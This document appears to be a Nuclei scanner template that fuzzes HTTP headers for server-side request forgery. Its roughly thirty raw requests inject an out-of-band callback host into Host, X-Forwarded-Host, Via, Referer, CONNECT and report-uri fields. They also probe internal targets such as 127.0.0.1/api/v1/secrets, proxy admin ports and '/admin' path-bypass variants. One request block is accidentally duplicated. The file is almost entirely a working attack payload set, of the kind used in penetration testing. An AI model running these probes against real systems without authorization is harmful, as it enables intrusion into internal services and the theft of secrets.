id: header-injection

info:
  name: Header SSRF Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for OOB SSRF
  tags: fuzz,ssrf

requests:
  - payloads:
      header: /Users/faique/pentest/CVE/ssrf/proxy-headers.txt

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}@{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
        GET / HTTP/1.1
        Host: {{Hostname}}@{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}@{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET @{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Connection: close
      - |
        GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Via: {{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}/?{{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        Via: {{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Referer: {{BaseURL}}/?url={{interactsh-url}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Referer: {{BaseURL}}/?url={{interactsh-url}}
        True-Client-IP: {{interactsh-url}}
        X-WAP-Profile: http://{{interactsh-url}}/wap.xml
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct"
        Connection: close
      - |
        GET /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: {{interactsh-url}}
        Connection: close
      - |
        GET /api/v1/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        GET /api/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        GET /api/v1/secrets HTTP/1.1
        Host: 127.0.0.1
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        CONNECT {{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: {{interactsh-url}}
        X-Forwarded-For: {{interactsh-url}}
      - |
        POST / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: {{interactsh-url}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: {{interactsh-url}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{Hostname}}
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{interactsh-url}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /stats HTTP/1.1
        Host: 127.0.0.1:9901
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8001
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8444
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close

    redirects: true
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
          - 302
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
